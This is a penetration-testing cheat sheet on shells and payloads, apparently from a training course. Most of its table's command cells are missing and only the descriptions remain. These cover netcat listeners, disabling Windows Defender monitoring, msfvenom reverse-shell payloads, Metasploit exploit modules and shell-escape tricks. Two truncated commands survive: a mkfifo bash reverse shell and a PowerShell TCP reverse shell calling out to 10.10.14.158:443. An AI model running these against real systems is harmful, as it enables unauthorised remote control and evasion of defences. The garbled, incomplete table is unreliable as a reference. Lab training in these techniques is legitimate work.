Shells & Payloads
Commands | Description |
---|---|
| CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol |
| Works with many different command language interpreters to discover the environmental variables of a system. This is a great way to find out which shell language is in use |
| Starts a netcat listener on a specified port |
| Connects to a netcat listener at the specified IP address and port |
`rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 |
`powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535 | %{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
| Powershell command used to disable real-time monitoring in Windows Defender |
| Metasploit exploit module that can be used on a vulnerable Windows system to establish a shell session utilizing smb & psexec |
| Command used in a meterpreter shell session to drop into a system shell |
| MSFvenom command used to generate a Linux-based reverse shell stageless payload |
| MSFvenom command used to generate a Windows-based reverse shell stageless payload |
| MSFvenom command used to generate a MacOS-based reverse shell payload |
| MSFvenom command used to generate an ASP web reverse shell payload |
| MSFvenom command used to generate a JSP web reverse shell payload |
| MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload |
| Metasploit exploit module used to check if a host is vulnerable to ms17_010 |
| Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17_010 |
| Metasploit exploit module that can be used to obtain a reverse shell on a vulnerable Linux system hosting rConfig 3.9.6 |
| Python command used to spawn an interactive shell on a Linux-based system |
| Spawns an interactive shell on a Linux-based system |
| Uses Perl to spawn an interactive shell on a Linux-based system |
| Uses Ruby to spawn an interactive shell on a Linux-based system |
| Uses Lua to spawn an interactive shell on a Linux-based system |
| Uses AWK command to spawn an interactive shell on a Linux-based system |
| Uses Find command to spawn an interactive shell on a Linux-based system |
| An alternative way to use the Find command to spawn an interactive shell on a Linux-based system |
| Uses the text-editor VIM to spawn an interactive shell. Can be used to escape "jail-shells" |
| Used to list files & directories on a Linux-based system and shows the permission for each file in the chosen directory. Can be used to look for binaries that we have permission to execute |
| Displays the commands that the currently logged on user can run as sudo |
| Location of laudanum webshells on ParrotOS and Pwnbox |
| Location of Antak-Webshell on Parrot OS and Pwnbox |
Last updated